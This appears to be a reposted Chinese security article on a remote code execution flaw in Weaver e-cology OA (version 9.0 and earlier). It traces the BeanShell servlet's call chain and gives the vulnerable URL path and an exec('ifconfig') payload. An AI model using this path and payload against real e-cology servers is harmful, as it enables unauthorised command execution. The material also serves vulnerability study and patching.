碼上歡樂
相關內容    簡體    繁體

泛微 e-cology遠程代碼執行漏洞

本文轉載自   查看原文   2019-09-20 17:02   2070    滲透測試

影響版本:泛微 e-cology<=9.0

漏洞分析:    

問題出現在 resin 下 lib 中的 bsh.jar 文件里,問題類 bsh.servlet.BshServlet,可 doGet 方法從 getParameter 中接收參數, Request 請求會交給evalScript 方法來進行處理。

參數傳遞

doGet--》getParameter--》 evalScript--》 localInterpreter.eval

 

 

漏洞利用:訪問 http://url/weaver/bsh.servlet.BshServleth

 

 

輸入payload

exec("ifconfig")

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 泛微e-cology系統遠程代碼執行漏洞 泛微e-cology OA 遠程代碼執行漏洞 泛微E-cology OA /weaver/ 代碼執行漏洞 泛微e-cology OA 遠程代碼執行漏洞復現 泛微e-cology OA系統遠程代碼執行漏洞及其復現 泛微 e-cology OA 遠程代碼執行漏洞復現 泛微e-cology OA Beanshell組件遠程代碼執行漏洞復現CNNVD-201909-1041 泛微OA E-cology(CNVD-2019-32204)遠程命令執行漏洞復現分析 泛微 e-cology OA 前台SQL注入漏洞 泛微 e-cology OA 前台SQL注入
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM